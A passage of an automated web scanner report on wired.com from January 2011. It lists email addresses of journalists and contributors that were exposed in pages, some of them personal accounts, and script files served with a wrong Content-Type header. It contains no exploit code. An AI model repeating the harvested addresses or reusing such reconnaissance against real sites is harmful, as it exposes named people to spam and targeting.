ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:07:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:43:45 GMT
Date: Wed, 12 Jan 2011 15:35:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.127. http://www.wired.com/underwire/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/underwire/

Issue detail

The following email addresses were disclosed in the response:

angela_watercutter@wiredmag.com
eraserheadz@gmail.com
hmhart@pacbell.net
hugh.hart@att.net
johnscottlewinski@mac.com
loresjoberg@wired.com
lwallace@wired.com
wired@morphizm.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 05:02:36 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=337
Expires: Wed, 12 Jan 2011 05:10:05 GMT
Date: Wed, 12 Jan 2011 05:04:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 138529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:lwallace@wired.com">
...[SNIP]...
<a href="mailto:lwallace@wired.com">
...[SNIP]...
<a href="mailto:eraserheadz@gmail.com">
...[SNIP]...
<a href="mailto:lwallace@wired.com">
...[SNIP]...
<a href="mailto:hugh.hart@att.net">
...[SNIP]...
<a href="mailto:eraserheadz@gmail.com">
...[SNIP]...
<a href="mailto:lwallace@wired.com">
...[SNIP]...
<a href="mailto:lwallace@wired.com">
...[SNIP]...
<a href="mailto:hugh.hart@att.net">
...[SNIP]...
<a href="mailto:loresjoberg@wired.com">
...[SNIP]...
<a href="mailto:lwallace@wired.com">
...[SNIP]...
<a href="mailto:hmhart@pacbell.net">
...[SNIP]...
<a
href="mailto:johnscottlewinski@mac.com">
...[SNIP]...
<a href="mailto:wired@morphizm.com">
...[SNIP]...
<a
href="mailto:angela_watercutter@wiredmag.com">
...[SNIP]...

7.128. http://www.wired.com/wiredscience/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/wiredscience/

Issue detail

The following email addresses were disclosed in the response:

betsy_mason@wired.com
brandon@earthlab.net
dave_mosher@wired.com
justarikia@gmail.com
ligrossman@gmail.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 04:27:14 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=305
Expires: Wed, 12 Jan 2011 05:10:25 GMT
Date: Wed, 12 Jan 2011 05:05:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 102705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:dave_mosher@wired.com">
...[SNIP]...
<a href="mailto:brandon@earthlab.net">
...[SNIP]...
<a href="mailto:ligrossman@gmail.com">
...[SNIP]...
<a href="mailto:betsy_mason@wired.com">
...[SNIP]...
<a href="mailto:dave_mosher@wired.com">
...[SNIP]...
<a href="mailto:ligrossman@gmail.com">
...[SNIP]...
<a href="mailto:dave_mosher@wired.com">
...[SNIP]...
<a href="mailto:brandon@earthlab.net">
...[SNIP]...
<a href="mailto:ligrossman@gmail.com">
...[SNIP]...
<a href="mailto:brandon@earthlab.net">
...[SNIP]...
<a href="mailto:betsy_mason@wired.com">
...[SNIP]...
<a href="mailto:brandon@earthlab.net">
...[SNIP]...
<a href="mailto:justarikia@gmail.com">
...[SNIP]...

8. Content type incorrectly stated previous
There are 15 instances of this issue:

/js/ads/google_customize.js
/js/cn-fe-ads/cn.ad.lotame.js
/js/cn-fe-ads/cn.dart.js
/js/cn-fe-common/cn.js
/js/comments/commentBroker.js
/js/comments/prototype.js
/js/ecom/ecomfw.min.js
/js/global.js
/js/jquery-1.3.2.min.js
/js/omniture/s_code.js
/js/videos/MobileCompatibility.js
/js_blogs/json2.js
/js_blogs/popup.js
/threatlevel/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js
/threatlevel/xmlrpc.php

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

8.1. http://www.wired.com/js/ads/google_customize.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js/ads/google_customize.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/ads/google_customize.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

8.2. http://www.wired.com/js/cn-fe-ads/cn.ad.lotame.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js/cn-fe-ads/cn.ad.lotame.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /js/cn-fe-ads/cn.ad.lotame.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

8.3. http://www.wired.com/js/cn-fe-ads/cn.dart.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js/cn-fe-ads/cn.dart.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /js/cn-fe-ads/cn.dart.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

8.4. http://www.wired.com/js/cn-fe-common/cn.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js/cn-fe-common/cn.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/cn-fe-common/cn.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

8.5. http://www.wired.com/js/comments/commentBroker.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js/comments/commentBroker.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/comments/commentBroker.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

8.6. http://www.wired.com/js/comments/prototype.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js/comments/prototype.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/comments/prototype.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

8.7. http://www.wired.com/js/ecom/ecomfw.min.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js/ecom/ecomfw.min.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /js/ecom/ecomfw.min.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

8.8. http://www.wired.com/js/global.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js/global.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

8.9. http://www.wired.com/js/jquery-1.3.2.min.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js/jquery-1.3.2.min.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/jquery-1.3.2.min.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

8.10. http://www.wired.com/js/omniture/s_code.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js/omniture/s_code.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/omniture/s_code.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

8.11. http://www.wired.com/js/videos/MobileCompatibility.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js/videos/MobileCompatibility.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

8.12. http://www.wired.com/js_blogs/json2.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js_blogs/json2.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /js_blogs/json2.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

8.13. http://www.wired.com/js_blogs/popup.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js_blogs/popup.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js_blogs/popup.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

8.14. http://www.wired.com/threatlevel/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/threatlevel/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /threatlevel/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Wed, 12 Jan 2011 05:12:31 GMT
Date: Wed, 12 Jan 2011 05:02:31 GMT
Content-Length: 9027
Connection: close

/*
Shutter Reloaded for NextGEN Gallery
http://www.laptoptips.ca/javascripts/shutter-reloaded/
Version: 1.3.1
Copyright (C) 2007-2008 Andrew Ozz
Released under the GPL, http://www.gnu.org/copyle
...[SNIP]...

8.15. http://www.wired.com/threatlevel/xmlrpc.php previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/threatlevel/xmlrpc.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /threatlevel/xmlrpc.php HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Tue, 11 Jan 2011 23:15:36 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 05:10:04 GMT
Date: Wed, 12 Jan 2011 05:02:04 GMT
Content-Length: 114
Connection: close

XML-RPC server accepts POST requests only.

Report generated by Unforgivable Vulnerabilities, DORK Search, Exploit Research at Wed Jan 12 09:56:56 CST 2011.